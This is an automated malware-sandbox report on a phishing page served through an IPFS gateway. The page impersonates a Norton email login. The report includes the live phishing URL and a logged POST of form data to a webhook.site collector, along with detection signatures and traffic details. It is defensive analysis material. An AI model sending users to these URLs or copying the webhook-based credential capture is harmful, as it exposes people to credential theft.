Edit tour

Windows Analysis Report
https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q

Overview

General Information

Sample URL:	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q
Analysis ID:	1590440
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

Uses IPFS gateway to access IPFS content in browser (often used in phishing/scams)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2196,i,7131561303535393596,11780797804919219078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_54	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: GET /ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q HTTP/1.1Host: ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: alphatrade-options.com
Source: global traffic	DNS traffic detected: DNS query: webhook.site
Source: global traffic	DNS traffic detected: DNS query: www.xsjcjre.com
Source: global traffic	DNS traffic detected: DNS query: google.com

Source: unknown

HTTP traffic detected: POST /87f659f6-075d-4e0e-b197-649a09850ad0 HTTP/1.1Host: webhook.siteConnection: keep-aliveContent-Length: 55sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://ipfs.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_54.3.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
Source: chromecache_54.3.dr	String found in binary or memory: https://alphatrade-options.com/git/rand/favicon.png
Source: chromecache_54.3.dr	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/26-269507_arbys-logo-transpar
Source: chromecache_54.3.dr	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=
Source: chromecache_54.3.dr	String found in binary or memory: https://webhook.site/87f659f6-075d-4e0e-b197-649a09850ad0
Source: chromecache_54.3.dr	String found in binary or memory: https://www.google.com/s2/favicons?domain=

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50015 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@21/13@24/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2196,i,7131561303535393596,11780797804919219078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2196,i,7131561303535393596,11780797804919219078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label	Link
https://alphatrade-options.com/git/rand/favicon.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	216.58.212.142	true	false	high
www.google.com	216.58.206.36	true	false	high
webhook.site	178.63.67.153	true	false	high
ipfs.io	209.94.90.1	true	false	high
alphatrade-options.com	unknown	unknown	false	high
www.xsjcjre.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://webhook.site/87f659f6-075d-4e0e-b197-649a09850ad0	false		high
https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com/s2/favicons?domain=	chromecache_54.3.dr	false		high
https://alphatrade-options.com/git/rand/favicon.png	chromecache_54.3.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
178.63.67.153	webhook.site	Germany	24940	HETZNER-ASDE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
209.94.90.1	ipfs.io	United States	40680	PROTOCOLUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590440
Start date and time:	2025-01-14 01:47:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@21/13@24/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.131, 216.58.212.174, 108.177.15.84, 2.17.190.73, 172.217.18.14, 142.250.184.206, 216.58.206.74, 142.250.186.42, 142.250.186.74, 142.250.185.234, 142.250.185.170, 142.250.185.106, 172.217.18.10, 142.250.185.138, 172.217.16.202, 142.250.186.170, 216.58.212.170, 142.250.186.138, 216.58.212.138, 142.250.185.74, 142.250.184.234, 142.250.185.202, 172.217.23.106, 142.250.74.202, 172.217.18.106, 199.232.214.172, 142.250.184.238, 142.250.185.142, 216.58.206.78, 142.250.181.238, 216.58.206.35, 142.250.185.238, 20.190.160.17, 13.107.246.45, 184.28.90.27, 52.149.20.212, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients.l.google.com, firebasestorage.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q

Input	Output
URL: https://ipfs.io Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://ipfs.io
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please sign in with your email", "prominent_button_name": "Continue", "text_input_field_labels": [ "Email Address", "Email Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please sign in with your email", "prominent_button_name": "Continue", "text_input_field_labels": [ "kk7ff0@xsjcjrc.com", "" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "brands": [ "Norton" ] }
	{ "brands": [ "Norton" ] }
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please sign in with your email", "prominent_button_name": "Continue", "text_input_field_labels": [ "Please enter your password." ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	```json{ "legit_domain": "norton.com", "classification": "wellknown", "reasons": [ "The brand 'Norton' is a well-known cybersecurity company.", "The URL 'ipfs.io' does not match the legitimate domain 'norton.com'.", "IPFS (InterPlanetary File System) is a decentralized storage network and is not associated with Norton.", "The use of a decentralized network like IPFS for a brand like Norton is unusual and suspicious.", "The email input field suggests a login or registration form, which is common in phishing attempts." ], "riskscore": 9} Google indexed: False
URL: ipfs.io Brands: Norton Input Fields: kk7ff0@xsjcjrc.com,
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "brands": [ "Norton" ] }
	{ "brands": [ "Norton" ] }
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Login failed! Please enter correct password.", "prominent_button_name": "Continue", "text_input_field_labels": [ "kk7fi0@xsjcjre.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	```json{ "legit_domain": "norton.com", "classification": "wellknown", "reasons": [ "Norton is a well-known brand associated with cybersecurity and antivirus software.", "The URL 'ipfs.io' does not match the legitimate domain 'norton.com'.", "IPFS (InterPlanetary File System) is a decentralized storage network and is not associated with Norton.", "The presence of a password input field on a non-legitimate domain is suspicious and indicative of phishing." ], "riskscore": 9} Google indexed: False
URL: ipfs.io Brands: Norton Input Fields: Please enter your password.
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	{ "brands": [ "Norton" ] }
	{ "brands": [ "Norton" ] }
URL: https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q Model: Joe Sandbox AI	```json{ "legit_domain": "norton.com", "classification": "wellknown", "reasons": [ "The brand 'Norton' is a well-known cybersecurity company.", "The URL 'ipfs.io' does not match the legitimate domain 'norton.com'.", "The domain 'ipfs.io' is associated with the InterPlanetary File System (IPFS), which is unrelated to Norton.", "The presence of an unrelated domain suggests a potential phishing attempt.", "The input field email 'kk7fi0@xsjcjre.com' does not provide any direct association with Norton." ], "riskscore": 9} Google indexed: False
URL: ipfs.io Brands: Norton Input Fields: kk7fi0@xsjcjre.com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 860 x 460, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	56109
Entropy (8bit):	7.973537367126651
Encrypted:	false
SSDEEP:	768:K2IH1Jqp3G6W3cZZq0PtaJg01kv+HnSKDS+Mj4wjRHQV2w/BCnhdKGNqvzgkH0O1:ArqpXH3RlCgLFjj4mRHs2w0n6IstzQq
MD5:	CE793AC1E75B3F60908CC6E3D63379E5
SHA1:	3BF1BAD607D899BB91DECB1BB0B32A0D82C233A8
SHA-256:	42171D76548498998DA88F032ABA50A028B9481FD7004A9A3B5D3B8D98FE48A2
SHA-512:	025C6474A68618D59ABD019B1821C5ACBDA6958FF7FC9D97DBBECA02C0BCBE2C5329603AE61EC89B00DBA1F09525F76D04B54BC6D9B5B8D230609282E78CC1FC
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...\.................IDATx....T..........vE....(..."..{..z.M.J...^ ..T. $@..........L..g.=s.p}<G!..u].i....#!..B.!..b>..@.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B4.U./.%.M.M.G..x..!..B.".....Z).C..$..H...<^..B..p.B....B.!..E..p.B.!.P..!....!..B(\..B."..B..p.B(\..B.!..B....E.!....!.P..!..B(\....!..B.....Trrrd.M2w.&....q..l.[..U...J.!....!....$...w....d....y.U..B.!..E.!u....o..k.7..5kx..!..B."....!..B....B."..B..p.B(\..B.!.P..!..E.!..B.".P..!..B(\.......B.!..BH......W\...QQ.s....{.7..k.UQ.$.@U...!..B(\..gSYY)K.,i62.....+.....>w.Jy...&...D..\..!..B....B.p.B.!.P..!..B.!....!..E."..B....B.p.B.!.P..!..B.!....!..E."..B....B.p.B.!.P

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	492
Entropy (8bit):	7.443140866786406
Encrypted:	false
SSDEEP:	12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
MD5:	3CA64F83FDCF25135D87E08AF65E68C9
SHA1:	B82D0979D555BD137B33C15021129E06CBEEA59A
SHA-256:	2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
SHA-512:	7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 860 x 460, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	56109
Entropy (8bit):	7.973537367126651
Encrypted:	false
SSDEEP:	768:K2IH1Jqp3G6W3cZZq0PtaJg01kv+HnSKDS+Mj4wjRHQV2w/BCnhdKGNqvzgkH0O1:ArqpXH3RlCgLFjj4mRHs2w0n6IstzQq
MD5:	CE793AC1E75B3F60908CC6E3D63379E5
SHA1:	3BF1BAD607D899BB91DECB1BB0B32A0D82C233A8
SHA-256:	42171D76548498998DA88F032ABA50A028B9481FD7004A9A3B5D3B8D98FE48A2
SHA-512:	025C6474A68618D59ABD019B1821C5ACBDA6958FF7FC9D97DBBECA02C0BCBE2C5329603AE61EC89B00DBA1F09525F76D04B54BC6D9B5B8D230609282E78CC1FC
Malicious:	false
Reputation:	low
URL:	https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/26-269507_arbys-logo-transparent-norton-secured-logo-png-png.png?alt=media&token=270a0942-12e5-423b-8855-04615084dca8
Preview:	.PNG........IHDR...\.................IDATx....T..........vE....(..."..{..z.M.J...^ ..T. $@..........L..g.=s.p}<G!..u].i....#!..B.!..b>..@.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B.!..B....B.!..B(\..B.!..B(\..B.!..B."..B.!....!..B.!....!..B.!.P..!..B.!..E.!..B.!..E.!..B.!..B.!..B..p.B.!..B..p.B4.U./.%.M.M.G..x..!..B.".....Z).C..$..H...<^..B..p.B....B.!..E..p.B.!.P..!....!..B(\..B."..B..p.B(\..B.!..B....E.!....!.P..!..B(\....!..B.....Trrrd.M2w.&....q..l.[..U...J.!....!....$...w....d....y.U..B.!..E.!u....o..k.7..5kx..!..B."....!..B....B."..B..p.B(\..B.!.P..!..E.!..B.".P..!..B(\.......B.!..BH......W\...QQ.s....{.7..k.UQ.$.@U...!..B(\..gSYY)K.,i62.....+.....>w.Jy...&...D..\..!..B....B.p.B.!.P..!..B.!....!..E."..B....B.p.B.!.P..!..B.!....!..E."..B....B.p.B.!.P

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	492
Entropy (8bit):	7.443140866786406
Encrypted:	false
SSDEEP:	12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
MD5:	3CA64F83FDCF25135D87E08AF65E68C9
SHA1:	B82D0979D555BD137B33C15021129E06CBEEA59A
SHA-256:	2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
